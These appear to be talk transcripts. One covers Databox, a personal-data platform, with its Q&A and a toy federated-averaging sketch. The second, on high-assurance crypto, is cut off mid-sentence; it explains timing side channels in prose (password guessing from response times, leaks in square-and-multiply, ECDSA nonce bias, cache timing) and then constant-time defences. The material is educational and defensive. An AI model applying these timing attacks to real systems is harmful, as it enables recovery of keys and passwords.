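As a toy version of what "small data analytics" across many boxes could look like, here is a sketch in which each box only ever reports a sum and a count for its demographic bucket, never the raw readings. The buckets and numbers are invented, and the real wide-area machinery would be far more involved.

# Toy federated aggregation: each Databox contributes only (bucket, sum, count)
# for the week, never the underlying readings. All values here are invented.
from collections import defaultdict

def local_report(readings_kwh, bucket):
    # computed on the box, next to the raw data; only the summary leaves the box
    return bucket, sum(readings_kwh), len(readings_kwh)

reports = [
    local_report([9.1, 8.7, 9.5, 8.9, 9.0, 9.3, 9.2], "3-bed semi"),        # my box
    local_report([6.2, 6.0, 6.5, 6.1, 6.3, 6.4, 6.0], "3-bed semi"),        # a neighbour's box
    local_report([12.0, 11.5, 12.3, 11.9, 12.1, 12.2, 11.8], "5-bed detached"),
]

totals = defaultdict(lambda: [0.0, 0])
for bucket, s, n in reports:
    totals[bucket][0] += s
    totals[bucket][1] += n

for bucket, (s, n) in totals.items():
    print(bucket, "average daily kWh:", round(s / n, 2))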
Perhaps the most complete set of applications that got built was actually built in collaboration with the BBC. This is a collaboration that has been talked about publicly; I think there's a blog post on their website from a few months ago that describes it, the idea of a thing they called the BBC Box. The idea here was to take data from data sources that they would not wish to have direct access to themselves. In this case, I think it was your iPlayer viewing habits, iPlayer being the BBC's content delivery system, one of them at the time, but also data from your Spotify account and your Instagram account. So the aim was to take data from those three sources. They obviously don't want to have the data from your Spotify account, they don't want the data from your Instagram account; there's no reason they would want to hold that, it would only be a risk for them. That data goes into your Databox, and then they have a BBC application running on your Databox which is able to process it to produce a profile, which can then be sent to their content recommendation system, and so appropriate content can be recommended to you, based on quite rich data about your activities online, but without them having to have direct access to that data. Excuse me. There were a couple of other applications. We ran a hack day a couple of years ago using an earlier version of this, and there were a couple of applications I thought were pretty cool, one of which explored the idea that you could do actuation through this as well. You could imagine having, and in fact the couple of people involved in this demonstration did actually produce it, a video editing suite where you assemble, let's say, a horror film from snippets of footage. You could put events in that horror film, and then playback is controlled by an application sitting on your Databox, and when the appropriate points in the horror film come up, the playback application flickers the lights in your living room, where you're sitting watching the film. So you can have that without the publisher of the data, the BBC or whoever it might be that's broadcasting this film, needing to have direct access to control the lights in your living room, which obviously they wouldn't want to have and you probably wouldn't want them to have. So this is the idea of devolving the control to a device that's under your control, so it can then interact with your environment, monitor your environment, control your environment, but under your control. So that's Databox, which, as I mentioned, you could think of as Dataware version 2. So where's the interaction that's going on here? How is this better supporting the I in HDI, the interaction in human-data interaction? It does better, perhaps, than Dataware did, but it became clear as we were going through this project that it's still not enough. It's still the case that the request and the processing tend to occur in a black box. An app is a contained environment: you can't see where it's got up to, you can't see what it's doing. It's not clear what the status of each of these applications is as they're executing in the system. We have got this audit logging support in there, and it's possible that using that you could come up with some kind of notion of where the processing has got to, what the status of the application is, but what we can do at the moment just with IO is probably not rich enough.
We have a number of mechanisms, such as audit logging, permissions and requests, that allow us to coordinate to some extent within the Databox what's going on. But they don't support what the HCI folks call articulation work, which I'll talk about on the next slide. And then the third thing is that real-world data sharing tends to be recipient designed. I will share data, I will share information rather, with people based on the context that we're in. I might talk about something in the pub with a colleague that I wouldn't talk about with my wife; I might talk about something with my wife at home that I wouldn't talk about with a colleague in the office, and so forth. Where I am controls to some extent, and who I'm speaking with controls to some extent, what I'm willing to reveal to them. And the ways that we support this in Databox are a little bit too slow moving. You tend to make the decisions at the point of installation of an application, and it's not necessarily straightforward to go back and change those later. It's not easy to be sufficiently dynamic in how those permissions are being granted and controlled. I mentioned articulation work. There are some quotes from a paper by Schmidt that defines this, but the way it was explained to me, as somebody who is not subtle enough to really understand some of these kinds of concepts, was with the example of walking down a busy street. If you're walking down a busy street, you're probably walking to get somewhere, so the work you're doing is walking to your destination. But in the course of doing that, you have to do a lot of articulation work. You've got to make sure you don't bump into other people on the street, you've got to make sure you don't bump into signage on the street, you've got to make sure you don't walk into the road and get hit by a bus. And all of this coordination work that you and everybody else on that busy street are carrying out, this is articulation work. It's the work that needs to be done in order that the work you want to do gets done. A data subject in the Databox is engaged in this kind of cooperative work; there is the subject, the data processor, and there may be multiple data subjects involved. We don't really do enough in the architecture that we have to support this kind of articulation work, where everybody tries to work out what's going on with everybody else so that we can all come to the right conclusion and get the right things done. The other thing about this kind of recipient design, as observed by a sociology colleague, is that data is essentially acting as a boundary object. It's a thing that is used in a relational fashion: you use data in multiple ways, and it describes a relationship you have with something else. An example of a boundary object is a credit card receipt, in the sense that it is something which is used in multiple ways simultaneously. It's the proof of payment that the customer might have; it's the bank's proof that a valid transaction took place; it may be the supermarket's proof that the bank is supposed to pay them some money for the goods that you've taken away. All of these things are inherently relational; they're about the relationship between these parties. And it became clear when we started looking at these sorts of data that almost all personal data is in fact relational.
There's very little personal data which is so private that nobody else is included in it or affected by it. This is particularly true when you look at sensing data. Most households either have multiple parties living in the house, or at least occasionally have visitors coming to the house. And so the sensing data that you might start to see being collected commonly there is going to implicate multiple people. It's not just the homeowner, it's not just one party in the house, that should have control of that data or that is represented in that data. Even if you take something that most people think of as private, who thinks of their email as private? Okay, but presumably it came from or went to somebody else in most cases, and so even there, this is data which involves other people. So in some ways what we tried to do with Databox is flawed from the start, because we focused on the idea of an individual having control of data, and actually data is inherently social in some sense, and so it needs to be controlled in a more social way. So, moving towards wrapping up the presentation part of this, there are a number of interactional challenges posed for HDI which Databox doesn't fully resolve. It hopefully takes steps towards surfacing some of them, and perhaps resolving some of them, but it doesn't fix them. One is really a set of challenges around user-driven discovery. How do you discover, as a data processor, who out there has the data you might want to use? It's easy when you're collecting it and putting it in a cloud somewhere, because you've got it; you know what you've got. But how can you find out which of the households, which of the individuals in the population, has got a Databox and has the data that you wish to process, that would be useful to you? How do users discover what applications they might wish to install, the applications that might do things for them? How could they be empowered to make sure that they install the right applications, that they're happy with the applications they've installed? How do we control those discovery processes? There are a number of more standard mechanisms, I guess, that can be tried out here. Along with permissions, you can imagine social rating systems: you know, 14 of your friends have installed this app and they're all very happy with it, everybody's giving it five stars. These are ways of communicating to other users that these are good applications, that help them discover the right things. Legibility: there are mechanisms here that can support legibility, but legibility remains a problem. You should be able to visualize your own data; you do now have it in your Databox. It might be much more difficult to visualize the impact that other people's data has on your data, or on the processing of your data: what is going to be revealed as your data is processed, given what has already been revealed by other people. This is true both for data that exists now and for data that might become available in the future. There's a question here, again, that comes back to discoverability as well: what can processors discover about what you have, and, in the same way, what can you discover about what processors want? There may also be the need to edit data. If you detect that some data has been recorded which is wrong, you want to be able to go and change it.
This is, in some sense, another flaw in the way that we framed this; it was a deliberate flaw, but the framing is not complete. We focused very much on the data subject, on allowing the data subject to have control over data and data processing. Of course, there are more stakeholders than just the data subject in this. The data processor might legitimately want to know that you've not tampered with the data that you're revealing to them, that you haven't faked out your propensity to risk, for example, so that they give you lower insurance premiums. I understand that when insurance companies started saying, well, if you wear a Fitbit and we can see how active you are, we'll give you reductions on your health insurance, there were people who were putting their Fitbits on their dogs, or on a metronome, or using other mechanisms to try and fake out the data that was being recorded so that they could reduce their insurance premiums. There's clearly a need here to try and support some degree of legitimate interest on both sides, I guess. As I've hinted at, data is a social thing; most data is a social thing. You want to be able to delegate control, delegate access to data, but you also want to be able to revoke it. You want to be able to see what's been happening with your data, whether it's being edited, who's been viewing it, with whom it's being shared, and you want to be able to revoke those permissions. You also need to be able to negotiate. If you have multiple Databoxes in the household, for example, it might be legitimate for my Databox to have access to some of the IoT sensing data, and for the other adults in the house to have access to the same IoT sensing data in my home, like the energy consumption, smart metering and so forth. Any one of us can then reveal that data to a data processor. That might not be what we collectively wish to happen; it might be better if there were some way of negotiating so that we all agree that we are happy for this data to be revealed to this particular data processor. We have no mechanism to support that kind of social action at present. There's a need to think about who data is getting passed to: what can you do to work out, when you've revealed some data to somebody else, what they're going to do with it, and what's happening after you've made that revelation? I think from a technology perspective, the two of these that I find most interesting come down to the sharing of data and what to do about shared data. For sharing data, we want to be able to support offline data collection; we want to be able to support data collection from devices that are not necessarily co-located with the Databox. This means we want some kind of rendezvous and identity service, and it needs to be reliable and not infringe on the privacy of the people participating in it. Shared data is another interesting thing. There was a long-running argument, for about 18 months in this project, between myself and one of the collaborators around how to support this idea of shared data. What could we do, given that data is inherently shared, inherently social? Their stance was very much that what we needed to do was introduce the idea of a user account onto the Databox. We would be able to manage access to the data by having user accounts on the Databox, so that we could say, well, this other account is allowed to see that data, and so on.
It turned out, well, it was certainly my opinion, that that was going to be inordinately complicated to implement, because of what boiled down to the problem of who gets to manage these accounts, who gets to create accounts and who gets to control the accounts. With the current consumer systems that I'm aware of, there's no real way to do away with the idea of a root user, somebody who can see everything. And it's definitely the case, from other projects we were doing, that when you're looking at personal data, people are often actually less concerned about complete strangers seeing their personal data than they are about other people in their house seeing it. The idea that your parents might be able to see what all your internet viewing habits are is something that many people find quite upsetting, but the idea that the ISP can see what you're doing on the internet, they're not really too bothered about. So there was a difficulty there: if you introduce accounts, how are you going to manage the fact that there's going to be one account that has access to everything and can see absolutely everything that's going on? So I fought quite hard to keep things so that we had one Databox for one person. Unfortunately, that really doesn't solve this problem of social data. The closest we get to that is when we start thinking about the idea that we could replicate data within a household across a set of Databoxes, perhaps. And then, well, what I did again was punt on the hard problem. So you end up in a world where you're devolving the challenge of managing access to social data to a social matter. You say, well, you'll discuss it with other people in the house before you start revealing this data, because you know it's sensitive, because you're aware of other people's views; you're living in your house, in your social situation, and you're not unaware of the other people in the house and what they think about this. So I think those are two interesting challenges from a technical perspective: how to support these kinds of interactions and these kinds of needs in this system. And with that, I'll finish. Any questions? So thank you very much for the talk. If you have questions, please line up at the microphones. Microphone two. Thank you. Thanks for that. I wonder how you see this moving beyond academia into sort of broad adoption, and if you have any thoughts on something like the Estonian e-citizenship model for how this could potentially scale. And, I guess, also your thoughts on what you think needs to happen for this to be adopted at scale. So I'm not familiar enough with the Estonian e-citizenship model to comment on that. Frankly, I think that for this to be adopted at scale, we probably need to reinvent everything so it's a little bit less of a research prototype; that would be a good start. I think that one of the big challenges in terms of adoption is actually around what these applications might be. There was a strong interest from other parties in this project around IoT data particularly, and one of the things that seems to me to be the case around IoT data is that we've got all these opportunities to collect lots of it, but nobody's quite sure what to do with it in terms of really compelling applications that make a great deal of sense. So in that sense, it may be that it's all a dead duck.
And there's no need for anything like this, because in fact none of that's ever going to take off, because it's never going to be compelling enough to be really, really useful. So I think having some killer applications, or some real use cases that are valuable here, would be good. Some of the ones that I mentioned, the couple from the BBC and from other collaborators, who I think were from the University of York, at the hackathon we ran, started to become more interesting, I think. So you can start to see some use cases arriving there, but it's quite slow to find them and quite slow to build them. The other thing that we would definitely need for broader adoption of this sort of platform, and that we really need to fix as part of that rewrite, is to make the development process much, much easier. It turns out that essentially there were professional developers who were hired to build that BBC demo, and they did it, and they did a great job, and it worked. But I think everybody involved found the development process much harder than they expected. The idea that you can't simply access a cloud service when you want to in your code, that you have to request permission for that and actually think about all that process, is quite alien to modern development practices, I think. So I think the development process is something we really need to work on to actually give us a hope of being adopted. So yeah, two or three things. Thank you very much. More questions? Yeah, go ahead. Yeah, thanks a lot for the great talk. Would you say that, basically, what you had in mind when you developed this was IoT applications? Well, it sort of changed over time. When we first started with Dataware we were thinking about social media, social networks, email, IRC logs, chat logs and so forth as personal data. We constantly wanted to do things like getting banking data out; financial data was an obvious sort of thing that people find sensitive but would like to do interesting things with. As time passed, IoT became more of a thing. One of my collaborators in this project was essentially funded to look at IoT data specifically, so that was where the interest in that came from. I think that given the domestic context that we were targeting, IoT data is an obvious thing to look at, along with other sorts of household data. Financial data is another one that's still kind of obvious, and personal health data now, with wearables and the sorts of monitoring you can do. All of these things are there. But in some sense, I don't think it matters too much in terms of the challenges that we were coming across as we were doing this. They're fairly endemic across the space, whether it's IoT data or other forms of data. You start to realize quite soon, when you try and actually build these things, that you've got these problems: that data is inherently social, multiple people are implicated, and so on and so forth. Great. Any more questions? Oh yeah, microphone one, I think. I would like you to elaborate, if you could, on the different levels. There's the level of a household containing a family or someone, and there's the level of a community.
I think if you have something to control the temperature in the living room, you could have this box tell you that two other people, not named, in your household would like it to be somewhat warmer, but you're paying the bill, so you say that's not going to happen. And then the whole neighbourhood, street or block or something, that's a different level, where you have different questions and where you could make good use of this box. Yes, so that's an interesting challenge. That's part of the reason we were thinking about this kind of very widespread, federated data processing. The idea being that, as I understand it, one of the ways that you can nudge people to reduce energy consumption, for example, is to tell them what the average is for people in their demographic, and if that's lower than their own consumption, that acts as a prompt for them to think about bringing their consumption down. Whereas if you do it at too large a scale, everybody in the country, it becomes less meaningful. But if you know that households that are more or less the same configuration as yours are on average using a lot less energy, you might start to think about it. So that kind of drove those sorts of applications where you want to look at data across multiple Databoxes simultaneously, where those Databoxes may be spread across the wide area. We started to investigate some technical means to do that. There's a system that a postdoc of mine built called Owl, which is a data processing system for the OCaml programming language, and which was trying to embody some of those ideas. If you go to ocaml.xyz, that's the website for that particular thing; he spent I think 18 months and wrote 180,000 lines of OCaml code to implement it, which was fairly impressive. We haven't got to the point where we can deploy any of those ideas yet, or actually test any of them out, and certainly not at that sort of scale. That's something that I'm hoping to do in the next year or two, with some other developments that we've got in Cambridge around the digital built environment, where I might be able to start to deploy some of these ideas and see how they work with data which is being collected and managed at a scale larger than a single household, so you don't have the same kind of domestic framing for it. Okay, do you have any more questions? Microphone two. Could you elaborate a little bit further on the trust of applications, and especially if they start doing unintentional things, such as requesting data that, combined with other data, reveals information without you intending it to? So I think that's essentially one of the challenges that we haven't really addressed. If an application that you install asks for access to data that you have not given it permission to, it can't have that; those requests will simply be denied. But if an application that you've installed has been given access to some data, and it does some processing of that data and you're happy with that, and the results of that processing go back to the data processor's home base, and they're then able to join that with some other source of data that you had no idea about, we can't do anything about that at this point. And that's one of the challenges here: what to do when the data that you thought was okay turns out not to be okay to reveal, because somebody's found something else that lets them attack it in some way. I don't know what to do about it. Thanks.
So we have one more question. Yes? So when multiple apps are trying to access the same data, is there a standard that you're using, like semantic web standards, to understand the meaning of what certain rows or tables mean between applications? Not really, no. We didn't go down the route of trying to taxonomize everything and put everything into an ontology. At the moment the application writer just has to know the data source that they're accessing. So if they're accessing the Philips Hue lightbulb data, they happen to know what that format is. So each application is talking to its own data store within the Databox? No, the author of each application needs to know the format of the data that that application is going to process. So somebody has to go and look at some specs before they write their app. And how do you see this project, are there parallels with, let's say, the Solid project that's being led by Tim Berners-Lee, or the ownCloud project, where again I feel there's some common pattern? I think that, based on my understanding of those projects, we are focused on the platform and the control in the platform, and less on trying to control what the application tries to compute out of it. Solid, I think, has maybe moved on since I last looked at it, but I think initially it was quite focused around the browser, for example, and we're not trying to be in relationship to the web at all. It's about having a device. I think that's the other thing that, when I last looked, still seemed to be fairly unique, something we were doing differently: having a physical device that users could control directly, and trying to provide the affordances that you get by having a physical device, rather than having something that's just abstract software in the cloud somewhere that you can't really control in the same way. Thanks. Good. Microphone one. Hi. I'm curious if you have any data on the problem awareness in the UK? Sorry, data on the problem awareness among the population? Like, whether they're already aware of the implications, I guess. Off the top of my head, I don't. From a previous project, we did do a review of a lot of the privacy literature, so papers have been published about people's attitudes towards privacy and their understanding of the problems of privacy as represented in data, but I don't actually have any statistical data about how aware the population generally is of these kinds of issues. When we have looked a little bit at that sort of thing, for example when I was at Nottingham, we did some work with one of the standard surveys that I think the city council executed every year, or frequently anyway. And if I recall correctly, there were some questions in that, the answers to which did not make sense from a technical perspective. One of the questions that was asked was, do you use the internet? And a lot of the respondents said, no, I don't use the internet, why would I use the internet? Another question that was asked was, how do you arrange to meet up with friends? And a lot of those same respondents who don't use the internet use Facebook to meet up with friends. So I think it can be quite difficult from survey data sometimes to work out and tease apart what is really going on in terms of people's understandings and concerns about this, because some of these concepts are quite abstract.
And, as I said, a lot of it is very dynamic; it's a sort of recipient design. So I can give you one answer to the question, am I concerned about the privacy of my data, and if you frame the question slightly differently, I will give you a different answer, because you've triggered something else. And so I think it's quite difficult to gather really robust data where you can be satisfied with the inferences you draw. Thank you. So there are no more questions, I think. Another round of applause, please. Thank you. Thank you.
In this talk I will report on Databox, the focus of a UK-based research collaboration between the University of Cambridge, the University of Nottingham, and Imperial College, with support from industrial partners including the BBC. Databox is an open-source software platform that seeks to embody the principles of Human-Data Interaction by enabling individuals to see and exercise dynamic control over what is done with their personal data. The research project has melded computer systems design with ethnomethodological approaches to Human-Computer Interaction to explore how such a platform can make use of personal data accountable to individuals. We are all the subjects of data collection and processing systems that use data generated both about and by us to support many services. Means for others to use such data -- often referred to possessively as "your data" -- are only increasing with the long-heralded advent of the Internet of Things just the latest example. Simultaneously, many jurisdictions have regulatory and statutory instruments to govern the use of such data. Means to enable personal data management is thus increasingly recognised as a pressing societal issue. In thinking about this complex space, we formulated the notion of Human-Data Interaction (HDI) which resulted in the Databox, a platform enabling an individual data subject to manage, log and audit access to their data by others. The fundamental architectural change Databox embodies is to move from copying of personal data by others for central processing in the cloud, to distribution of data analysis to a subject-controlled edge platform for execution. After briefly introducing HDI, I will present the Databox platform design, implementation and current status.
10.5446/53137 (DOI)
Alright, now we can start for real. Please welcome Daniel and Tanja for their talk about high assurance crypto software. Thank you. So why is high assurance crypto software a thing? Why do we worry about the correctness of software, or the quality of software? Well, here are just some recent news reports about crypto getting broken so badly that the private keys leak; these are just reports from October and November, and this one nicely adds a headline saying timing is everything. These were timing attacks which completely broke elliptic-curve based cryptography, so badly that the private keys came out. Timing attacks are not a new thing. Back in the days when you were logging into a server and it was looking at your password, it might be doing a character-by-character check. So for instance you start by, well, let's find out what the first character is, so you're sending AAA, BBB, CCC. Now of course none of them will actually work; it would be very surprising if one of these were the right password. But you do observe the time it takes to say this password is wrong. And then you notice that CCC takes a little bit longer to fail. Yay, CCC. Then you're trying CAA, CBB and so on; they still fail and they all take about the same time to fail until you're getting to COO. And then you're trying again for the third character, and so on and so on. Eventually you get the password, and this was actually a thing. This was 1974, the TENEX system, an operating system where, well, back in 1974, before most of us here were born, you could log in and it would be doing just this character-by-character checking. So timing attacks to break cryptography, or break security, have been known for a long time, but of course things get more subtle when you go into cryptography rather than just character-by-character comparisons. For instance, if you're implementing your favorite cryptosystem, be it Diffie-Hellman in a finite field or be it RSA, then each time you have to compute an exponentiation. And then you go back to your Crypto 101 lectures, and you don't compute c times c times c, d times, but you remember that there was a square-and-multiply algorithm which tells you: okay, you look at the bits of the exponent, so here I'm going for the representation of d in bits. I'm looking at the length in bits, and then I start by initializing, and you can run this, it's just Sage code: you initialize with the message, in RSA decryption the ciphertext, and then for each step you're doing a squaring, and if the bit is set you're doing a multiplication. And this runs from, well, the first bit we've dealt with already, so from the second-highest bit all the way down to 2 to the 0, which in Sage, like in Python, means the endpoint of the range is not included, and then you output the result, the plaintext. Now there are some problems with this. If you're an attacker and you know that your user is using this to compute an RSA decryption, then you observe that this loop length gives you some information on d, namely the length of d in bits. This l was defined as, well, how many bits does d have, and then some d's, well, this d looks rather short: it is much shorter than n, it's much shorter than phi of n, so this would be an unusual d, and so the timing would leak that it's a little bit shorter. Also, here we have a branch: if this bit is 1 I go for the multiplication, and if not, well, I'll just continue. So depending on the level of fine-grained access, somebody could even see whether I'm going for a multiplication or just moving on to the next squaring.
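The Sage code from the slides is not reproduced in this transcript, but the loop being described is the textbook left-to-right square-and-multiply. A reconstruction along those lines, in plain Python that Sage will also run, looks like this (the branch on the secret bit is exactly the one under discussion):

# Reconstruction of the left-to-right square-and-multiply loop described above
# (not the exact slide code). Computes c**d mod n, with the timing leaks discussed.
def square_and_multiply(c, d, n):
    bits = bin(d)[2:]              # binary representation of the exponent d
    h = c                          # the top bit is handled by this initialization
    for b in bits[1:]:             # from the second-highest bit down to 2**0
        h = (h * h) % n            # always a squaring
        if b == '1':               # branch on a secret bit: multiply only if it is set
            h = (h * c) % n
    return h

assert square_and_multiply(7, 65537, 101) == pow(7, 65537, 101)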
In the worst case somebody could read out the pattern of 0s and 1s just by knowing whether I entered this branch or not. Now, if you're a remote attacker you only see the overall time. I have a picture here from something similar; it's not an exponentiation for RSA, it's an elliptic-curve scalar multiplication, from the recent TPM-Fail paper, and they observe how long it takes to compute, well, the equivalent operation: on elliptic curves you do double-and-add instead of square-and-multiply. And you can nicely see that the bulk of the computation, for most exponents, or scalars, takes this long, and if you have some leading 0 bits it's much faster, or at least somewhat faster. Now there is some variability, and it could be faster because your d is very sparse: it could be just a one and a whole bunch of 0s and then another one, and that would also be as fast as something which is a few bits shorter but more dense. So you don't know exactly whether it was short and therefore fast, or whether it was sparse, so few multiplications, and therefore fast; but if it's a lot faster, it's probably both: the top bits are missing and therefore you don't have multiplications there. So if it's very fast, you have a good guess that this thing was actually short, and so there's a strong dependency on the length, and there is also a dependency on the density. Now, typically your implementation will not actually be doing it bit by bit; I was surprised that this paper actually found an example where you're really going bit by bit, because most of the time our time is very precious and we want to speed things up. So if you take your favorite number, like 14019, also known as 0x36C3, and you write it in binary, and then you want to do your multiplication, well, your scalar multiplication, starting from the top bit all the way down, similar to the RSA loop, but you want to save on the number of multiplications, then you would be grabbing two bits at once. You precompute a few values: you can precompute your c, c squared and c cubed, and then to compute this exponentiation you're doing two squarings at once, so you're handling two of these positions at once. The first window you can skip because it's both zeros; the next one, the one-one, gives you a cube, so we're starting with c cubed, which we were nice enough to have precomputed. Now we're moving on by two bits, so instead of squaring once we square twice, that's why the fourth powers come in here; the next position is one, the next position is two, so we see a multiplication by c, and then, after raising to the fourth power, a multiplication by c squared. And everything is like the previous loop, except we're doing two bits at a time, and so instead of saying, oh, if the next bit is set we do a multiplication, we look at the value of the next two bits and then select from c, c squared, c cubed, or no multiplication. And this definitely reduces the number of multiplications: this would have normally taken seven multiplications, and this way we only take four. It doesn't change the number of squarings.
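Here is that 2-bit windowed loop as a sketch in plain Python (not the slide code). For 14019 it ends up doing four multiplications instead of the seven that the bit-by-bit loop would do:

# 2-bit fixed-window exponentiation as described above: precompute c, c^2, c^3,
# then consume the exponent two bits at a time (two squarings, at most one multiply).
def window2_pow(c, d, n):
    table = [1, c % n, (c * c) % n, (c * c * c) % n]      # precomputed c^0 .. c^3
    bits = bin(d)[2:]
    if len(bits) % 2:                                     # pad to an even number of bits
        bits = '0' + bits
    windows = [int(bits[i:i + 2], 2) for i in range(0, len(bits), 2)]
    first = next(i for i, w in enumerate(windows) if w)   # skip leading 00 windows
    h, mults = table[windows[first]], 0                   # start from the precomputed value
    for w in windows[first + 1:]:
        h = pow(h, 4, n)                                  # two squarings at once
        if w:                                             # table lookup plus one multiplication
            h = (h * table[w]) % n
            mults += 1
    return h, mults

result, mults = window2_pow(3, 14019, 2**61 - 1)          # 14019 = 0x36C3 = 11 01 10 11 00 00 11
assert result == pow(3, 14019, 2**61 - 1)
print("multiplications:", mults)                          # 4, versus 7 for the bit-by-bit loop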
Now, this will smooth out the effect of having a sparse integer, because as long as there's a single one in the window, and we call this thing a window here, it will cost a multiplication, whereas bit by bit it would be one multiplication here and no multiplication there. So when you look at the traces from this, you get much more accentuated boxes showing whether something is zero at the beginning or not, because most of the other steps cost a multiplication; in particular for larger windows, and this implementation seems to be taking four bits at once, so for those larger windows, most of the time, I mean, if you have four bits then there are 15 cases out of 16 where you have to do a multiplication and only one out of 16 where you don't. So it accentuates the length issue, and you have pretty much no idea whether, I mean how many of, the bits were set. Now, how much do these few bits matter? Of course you don't want to leak your secret RSA exponent, you don't want to leak your Diffie-Hellman exponent, but it's not too bad there; you would need a lot of knowledge, you would need the exponent to be either extremely short or extremely sparse to actually break something with this. It's somewhat worse if you're doing RSA with Chinese remainder theorem decryption, because then you can do some combination tricks: there's something we gave a few years ago on how you can combine information if you know a few bits of d mod p and of d mod q, and then you combine these and you learn more. Where it really goes bad is if you're doing signatures, DSA signatures or ECDSA signatures. These are extremely fragile systems, and it's a strange thing that just by looking at the scalar multiplication for a number which you will use only one single time, so your signature generation starts with you picking a random number, you do an exponentiation or scalar multiplication, and then you do something else with this number, that these one-time numbers, these one-time exponents, if they are somewhat biased, for instance if you know that the top four bits or top eight bits are always zero, you're getting the secret key. So it is a very, very strange property of these systems that this is possible, and this was exploited in the two papers from which I showed you the news coverage. There was TPM-Fail, this November, by Daniel Moghimi, Berk Sunar, Thomas Eisenbarth and Nadia Heninger, who showed that doing this to typical TPM implementations of cryptography, so you have your TPM in your computer in charge of doing the signatures, say for a VPN connection, they could get the keys out of the TPM remotely. There was another paper called Minerva, I haven't seen the paper yet, but they have a very nice and informative web page, by Ján Jančár, Petr Švenda and Vladimír Sedláček, where they do the same for smart cards which were actually certified. So this is a really bad attack, and it is something where all these implementations, both the TPMs and the smart cards doing the signatures, should have been tested for this before; but apparently people didn't test, or didn't realize that a small bias has such a huge effect. There are more attacks; this is just the basic one where you see the overall timing, but this already broke lots of libraries, smart cards and TPMs.
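As background (not covered in detail on the slides) on why a few biased nonce bits are so fatal: an ECDSA signature (r, s) on a hash z satisfies s = k^(-1) * (z + r*d) mod q, where k is the one-time nonce and d is the long-term secret key. If an attacker ever learns a whole nonce k, the key follows immediately as d = (s*k - z) * r^(-1) mod q. If instead the attacker only knows that, say, the top few bits of k are zero for many signatures, each signature still gives an approximate linear relation between the unknown d and a mostly unknown but bounded k modulo q; collecting enough of these turns key recovery into a hidden number problem that standard lattice techniques solve, which is the route attacks like TPM-Fail and Minerva take.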
If you are getting more detailed information, if you are on the same machine, say running a hyperthreading attack or a cache-timing attack, then you might even be able to figure out where the lookup into the table of precomputed values went: you booby-trap the table, and depending on whether the processor fetches this entry, which is in cache, or that entry, which is not, you learn something about the exponent, and you can even recover the exponent from that. Now, this is supposed to be a constructive talk, we said 80 percent constructive, so let us jump into how you would fix this. One thing is that for all our crypto implementations we actually know an upper bound. This is not an arbitrary exponentiation, it is an RSA decryption; we know a bound on n, people pick 2048-bit or 4096-bit keys, so we have a good upper bound on how long this d will be. So why not just use that? We make the loop length independent of what d actually is and simply take the number of bits of n rather than of d. The problem is that before, we started by initializing the message with the ciphertext and then kept squaring and multiplying. But there is an easy way out: we initialize at one, and if you square one it stays one until you have reached the bits that are actually occupied by d. So we pad d to the full length and initialize at one; this gives a fixed-length loop, and the initialization at one takes care of not modifying our values. Then we do the normal thing: we square and we conditionally multiply, except that we do not want this if/else. I mentioned cache-timing attacks, and in general you are definitely leaking how many bits there are, and you might be leaking more depending on how different your multiplication looks from your squaring. So what we typically do is give up a bit of performance: we do a multiplication for every bit, not just when the bit is one, and then we conditionally select which of the two results to take, the one computed with the multiplication, called h here, or the one without it. And we do not want an if and an else there, because an attacker could observe the branch, could see whether we take it or not, so we do the whole selection by arithmetic. Let us briefly run through it: if the bit is zero I have (1 - 0) times m, so I am getting m, plus 0 times h; so for a zero bit I compute m, which is what I wanted. For a one bit I should be grabbing h, and indeed (1 - 1) times m is zero, plus 1 times h gives h. This modification comes at a cost: the code is as slow as the worst case, both in the length, our loop has become longer so we do more squarings, and in doing a squaring and a multiplication for every bit, which previously was only the worst case. For RSA and Diffie-Hellman you can initialize at one and then keep multiplying in the base, respectively the generator, so that is cool. But if you try to do the same thing with elliptic curves, things get a little bit more iffy.
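Before the curves, here is a sketch of the constant-time loop just described, again on toy single-word values; a mask-based select stands in for the (1 - bit)*m + bit*h arithmetic, which amounts to the same selection, and NBITS and the helper names are illustrative assumptions:

#include <stdint.h>

#define NBITS 64                                  /* public upper bound, e.g. the bit length of n */

static uint64_t mulmod(uint64_t a, uint64_t b, uint64_t n) {
    return (uint64_t)(((__uint128_t)a * b) % n);
}

/* Constant-time select: returns x if bit == 0, y if bit == 1, no branch. */
static uint64_t ct_select(uint64_t x, uint64_t y, uint64_t bit) {
    uint64_t mask = (uint64_t)0 - bit;            /* all zeros or all ones */
    return (x & ~mask) | (y & mask);
}

static uint64_t modexp_ct(uint64_t c, uint64_t d, uint64_t n) {
    uint64_t m = 1;                               /* start at 1: squaring 1 is harmless padding */
    for (int i = NBITS - 1; i >= 0; i--) {
        uint64_t bit = (d >> i) & 1;
        m = mulmod(m, m, n);                      /* squaring for every position, always */
        uint64_t h = mulmod(m, c, n);             /* multiplication for every position, always */
        m = ct_select(m, h, bit);                 /* keep h only if the bit was 1, no if/else */
    }
    return m;
}

The loop always runs NBITS iterations and always performs both the squaring and the multiplication; only the final select depends on the key bit, and it does so without a branch.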
If you were here, by now it is five years ago, at 31C3, you saw us give a talk about elliptic curves, where we ranted a little about Weierstrass curves. One of the things that makes Weierstrass curves nasty to implement is that you always have to deal with an extra point: you have a nice curve, and then there is this extra point called the point at infinity. This point at infinity messes up most of the arithmetic, so you do not get nice formulas where you can just say, this is our neutral element, we start there and keep doubling; most of the formulas have exactly this point as an exception, so you cannot initialize there. There are ways around it, but the default is not as easy. There are nicer curves; we have been advertising Edwards curves and Montgomery curves. On Edwards curves the neutral element is nice: the curve has that starfish shape, the neutral element is the point sitting at 12 o'clock, and you can just use it, so for Edwards curves everything works out. I should also give a shout-out to Montgomery curves, for instance the famous Curve25519, which you probably have in your browser or in your phone. It uses formulas due to Peter Montgomery which are very happy with exactly this data flow, and you even get a discount: you do basically one doubling and one addition for each bit, the same as the squaring-plus-multiplication modification, except that here it is called doubling and addition. People joke that the renaming is just to make sure that mathematicians keep lifetime employment, because nobody could possibly understand it otherwise; sorry, the terminology came before me. But you get this combination of an addition and a doubling for less than it would otherwise cost, so it is not as expensive as the corresponding change is for RSA or Diffie-Hellman. In fact, the reason Curve25519 gets used with these Montgomery formulas is that for that bit size it is the fastest way to implement scalar multiplication, so it has the nice feature of being constant time and it is cheaper. If you needed more motivation for wanting constant time, there is an additional benefit: you have figured out how long something should take, and so certain things should simply not happen. If you know that your arithmetic finishes within time x, you will not enter an infinite loop, as the Microsoft cryptography library recently did on Windows 10. Oops, constructive talk, you said; so far we have had bug, bug, bug and a little bit of fixing. Maybe by now you believe that these timing attacks are a problem, and some people do believe it: OpenSSL has a few subroutines which are labelled, claimed, to be constant time, and there are other crypto 